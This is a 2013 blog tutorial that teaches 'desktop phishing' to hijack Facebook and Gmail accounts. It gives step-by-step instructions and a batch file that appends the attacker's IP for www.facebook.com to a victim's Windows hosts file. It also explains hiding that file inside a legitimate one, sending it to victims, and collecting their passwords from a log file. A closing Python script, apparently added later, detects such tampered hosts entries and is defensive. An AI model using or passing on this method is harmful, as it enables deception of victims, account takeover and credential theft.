Saturday, July 20, 2013


Desktop Phishing is another advanced type of phishing attack. In this article I will explain how you can use this method to hack Facebook and Gmail accounts.

This phishing attack is a bit advanced, and if you're a newbie I would recommend you read the following articles first:



Desktop Phishing Tutorial - Hack Facebook Accounts

Concept Behind The Hack:
The hosts file is a plain text file that an operating system uses to map host names to IP addresses. It played a large role before the Domain Name System (DNS) came into existence, and it is still consulted before any DNS query is made, so an entry in it overrides whatever DNS would have answered. In practice a hosts file controls how your browser finds websites.

You can use the hosts file to map any name or domain to an IP address. For example, if we add
74.125.236.84  www.facebook.com

to the hosts file, then when you type www.facebook.com in your browser it will open google.com instead of facebook.com, because 74.125.236.84 is Google's IP and the browser takes the hosts entry blindly. So if an attacker is able to add his own IP address (where he hosts the phisher page) to the victim's hosts file, the victim will be redirected to the attacker's phishing site.

What makes this attack so successful is that the victim will not know, since the URL in the address bar still reads facebook.com.

What Hackers Don't Teach You?
I see many tutorials on the net on Desktop Phishing, but most of them won't work because of the following things:
  • Nowadays everyone has a dynamic IP address (the IP changes every time you restart)
  • Now almost all computers are behind a router, so we have to port forward our web server in order to reach it. This is a little confusing for newbies.
But in this tutorial I will explain how you can overcome all these problems.


How To Overcome This Problem?
We can overcome the above problems by using a static VPN. With a VPN you will have a static IP address and you need not port forward your web server.


Demonstration
Things You Require:-

1. Phisher Page - You can download the Facebook phisher page from Here
(I've added an extra page to make it more realistic: the victim will get a message saying Facebook is blocked by your ISP)

2. Web server - You can use WAMP or XAMPP; I would recommend XAMPP. I have written a tutorial on how you can install and use XAMPP, kindly refer to that article for more details.

3. A static VPN - I will use proXPN VPN for this tutorial, but I recommend you use Strong Open VPN as it is very stable; you can download it from Here

Procedure:-

1. First download and install XAMPP on your PC, then start the Apache and MySQL services.


2. Download the Facebook phisher page from the link given above and place all its contents in the htdocs folder, which is under the XAMPP folder (the place where you installed XAMPP).


3. Install proXPN VPN or any other static VPN. I recommend you use Strong VPN as it is very stable and gives you a static IP. Once you install and run it, you will get a static (VPN) IP.



4. Now we have to add some text to the victim's hosts file, which is at C:\windows\system32\drivers\etc. You can do this in many ways, either by using an SFX archive or a batch file; for this tutorial we will use a batch file to accomplish the job.

@echo off
echo 172.X.XX.X.X   www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit

Replace "172.X.XX.X.X" with your (VPN) IP address, and finally save it as Something.bat

5. Now, to avoid suspicion, you can bind the batch file with a legitimate file. Kindly refer to the Binders tutorial for more info.

6. Now send the file via email or upload it to a site and ask the victim to download it. After the victim downloads and runs the file, his hosts file will be modified, so now whenever the victim enters facebook.com he will be redirected to our phisher page, but the URL will remain facebook.com.




To see all the victims' credentials and passwords, open the newly created log.txt file under the htdocs folder.
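From the defender's side the whole trick leaves one artifact: a routable address sitting next to a well-known hostname in the hosts file. The following Python script is an added example, not part of the original tutorial; it parses hosts-file text and flags such entries. The watched-domain list, the sample hosts content and the 172.16.0.9 / 203.0.113.7 addresses are constructed for illustration.

```python
import ipaddress

# Names that should never resolve through a workstation hosts file to a
# routable address. Illustrative watch list, not exhaustive (constructed).
WATCHED_DOMAINS = {"facebook.com", "gmail.com", "accounts.google.com"}

# Constructed sample of a tampered Windows hosts file (not a real capture).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost
127.0.0.1   localhost
172.16.0.9   www.facebook.com
203.0.113.7  gmail.com   # trailing comment
"""


def parse_hosts(text):
    """Yield (ip, hostname) pairs, skipping comments, blanks and bad lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop inline/full-line comments
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                           # not an address; ignore the line
        for name in parts[1:]:
            yield ip, name.lower()


def suspicious_entries(text, watched=WATCHED_DOMAINS):
    """Return entries that pin a watched domain (or its www. form) to a
    non-loopback address. Loopback entries are left alone: mapping a site to
    127.0.0.1 is a common blocking technique, not a redirect to a live server."""
    hits = []
    for ip, name in parse_hosts(text):
        base = name[4:] if name.startswith("www.") else name
        if base in watched and not ip.is_loopback:
            hits.append((str(ip), name))
    return hits


def scan_file(path):
    """Read a hosts file from disk and return its suspicious entries."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(fh.read())
```

Run scan_file() against C:\Windows\System32\drivers\etc\hosts on Windows or /etc/hosts elsewhere. A hosts-file redirect of an HTTPS site also produces a browser certificate warning, which is a second signal worth teaching users not to click through.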


Hope you liked the tutorial. For further doubts and clarifications please post your comments.
